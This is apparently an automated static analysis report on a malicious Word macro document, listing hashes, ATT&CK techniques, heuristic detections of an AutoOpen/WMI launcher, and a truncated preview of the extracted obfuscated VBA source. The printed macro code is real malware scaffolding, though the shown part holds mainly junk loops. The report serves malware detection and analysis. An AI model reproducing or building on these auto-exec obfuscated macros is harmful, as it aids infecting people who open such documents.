Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 fbe0c27f2661b6cc…

MALICIOUS

Office (OLE)

Size: 154.8 KB
Created: 2019-04-11 14:13:00
Authoring application: Microsoft Office Word
First seen: 2019-05-31
MD5: 37a2072d4df17f299c3de2d666a0e80e
SHA-1: 1baf8f48ce7463301866554424c5ca2f3e4d6191
SHA-256: fbe0c27f2661b6cc753d23d5ddcad207415bc235e426acc21ec07593c5551925
Risk Score: 282

Malware Insights

MITRE ATT&CK
  • T1059.005 Visual Basic
  • T1204.002 Malicious File
  • T1137.001 Office Application Startup: Office Test Scripts

The sample contains VBA macros with an autoopen subroutine, a common technique for executing malicious code upon document opening. Heuristics indicate the use of WMI to launch processes, suggesting the macro is designed to download and execute a secondary payload. The obfuscated nature of the VBA code prevents a more detailed analysis of its specific actions.

Heuristics (8)

  • ClamAV: Doc.Malware.00536d-6937584-0 [critical] CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Malware.00536d-6937584-0
  • VBA macros detected [medium, 4 related findings] OLE_VBA_MACROS
    Document contains VBA macro code
  • VBA WMI Win32_Process launcher [critical] OLE_VBA_WMI_PROCESS_CREATE
    VBA macro builds or references a WMI moniker for Win32_Process and invokes .Create to start a command. This is a high-confidence macro execution chain that often hides the WMI class name through string concatenation or helper functions.
  • AutoOpen macro [high] OLE_VBA_AUTOOPEN
    AutoOpen macro
  • GetObject call [high] OLE_VBA_GETOBJ
    GetObject call
  • VBA p-code auto-exec with execution tokens [high] OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Legacy WordBasic auto-exec macro marker [medium] OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL [info] EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://schemas.openxmlformats.org/drawingml/2006/main (channel: in document text, OLE body)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 38923 bytes
SHA-256: 87a21b2626eed3b43c3d81d457e96746ed9034c71f22ec4d01c3497f64219841
Preview of the extracted script (first 1,000 lines):
Attribute VB_Name = "Z4AxBUc"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "jx4Zc_U"
Attribute VB_Base = "0{103C49B8-CDD4-4761-8662-1EFAF30F852B}{FE5D26C4-8E51-4B39-AC38-D33FFB7A4504}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "wAAGUck"
Attribute VB_Base = "0{53B6AC09-460C-4DD2-9130-82F9FDFEB4A9}{00D347EF-3C70-4BB3-853B-FD2C9D3A214A}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "QAkGXwQ"
Sub autoopen()
   If EQ_UQ_C = Nk4wAA Then
  Do While jAUBD_QB And IABDX_D
      While OABA4U And 64732849
         oAAAA4k = Asc(950034646 / Oct(531804896))
      Wend
      For RCBAcAZU = 172177485 To 951924674
         wcADAA = 99237868
      Next
      Set wkAUBQ = wwCQAU
      If hGAoGDA Eqv 642833417 Then
         h_QAAAkC = CDate(ZwUAAAXU)
      End If
      While I1_AUA1 < dGAC4oA
         EZAo1ZBA = (IZAU_kA)
Wend
   Loop
End If
   If OQ1BQAAA = cGGAZZ Then
  Do While ocAAGD And kAUA4A
      While jUZQAk And 887881186
         ADAAkXoG = Asc(597044215 / Oct(411318129))
      Wend
      For sBX4UAUo = 372831526 To 729711231
         bckcG_A = 78672383
      Next
      Set iAZcBwQD = WDQQAX
      If IX11wkA Eqv 118078820 Then
         AAQQCDXA = CDate(I_DcADX)
      End If
      While iGZkAA < UQUA_AA
         NAAUDoAo = (s1QAAZA_)
Wend
   Loop
End If
p_1DGA
   If JkUBC1x = dU1kAZA Then
  Do While M1D1BU_ And UAACAAGU
      While bAUAkDA And 984689681
         wAUAZkX = Asc(334995197 / Oct(897233447))
      Wend
      For FXDAAA = 602540804 To 964581166
         nwA1kBQ = 941713516
      Next
      Set VxwCBAc_ = RZcxAk
      If qAAxZk Eqv 224799144 Then
         SU1AUCZ = CDate(wUAAAA)
      End If
      While EAAoBcAA < RUQDUc
         EAQCQZD = (hAQA1G)
Wend
   Loop
End If
   If v14QxBA = NkAGoC_D Then
  Do While MC_AUwG And WB4QkZ
      While AUkk_QA And 609792284
         IUc_AABU = Asc(421335260 / Oct(437109608))
      Wend
      For dAckDk = 660095315 To 340121662
         mZ_GoA = 758445518
      Next
      Set KX_QwwCU = lAUcABAA
      If jCoDcA Eqv 487373023 Then
         vBAcUAxD = CDate(uUUBUcDA)
      End If
      While qDkU1kA < cBAC4oD
         zAAAxU = (uD_Do4cD)
Wend
   Loop
End If
   If SXGUAD = uAZAB1 Then
  Do While a4DAAA4B And JoAkAAQC
      While hAXUUAwU And 534573086
         aAZoUAo = Asc(669997128 / Oct(709023313))
      Wend
      For qAABUQUA = 514942717 To 603920911
         S_UUkxU = 912727991
      Next
      Set TGAAwAAG = GBwAQk
      If zDAAAck Eqv 427663115 Then
         oA1A_xo = CDate(tBQABA)
      End If
      While bw_4c1C < b_AAGA
         uAx_DwAQ = (uXCA41Z4)
Wend
   Loop
End If
End Sub

Attribute VB_Name = "LU4xGUA"
Function p_1DGA()
On Error Resume Next
   If XAAcAADG = dAAAx_ Then
  Do While V4xQAX4X And RAXCADAw
      While MokoBZ And 148684133
         zAADAAQA = Asc(665758444 / Oct(655490864))
      Wend
      For X4XAUD4 = 723080684 To 878588818
         LAQQZkAA = 31076117
      Next
      Set EAx1DA = jBAoQ1A
      If VQAAoAk Eqv 543730137 Then
         PQAACU = CDate(GAkU_4A)
      End If
      While wCAAB4 < ZDXwxo
         sBGCG1 = (mQXDUDA)
Wend
   Loop
End If
   If uc1_kDQ = IcABABCU Then
  Do While nAwA_BAQ And ikQAXG
      While PcA1XQZk And 771568086
         tUAQDU = Asc(934442094 / Oct(684405984))
      Wend
      For fAA_QDAA = 133477167 To 381864372
         CUwA_AA1 = 354283342
      Next
      Set RXUADAXA = DGXABUU
      If hXADGAQ Eqv 358754312 Then
       
... (truncated)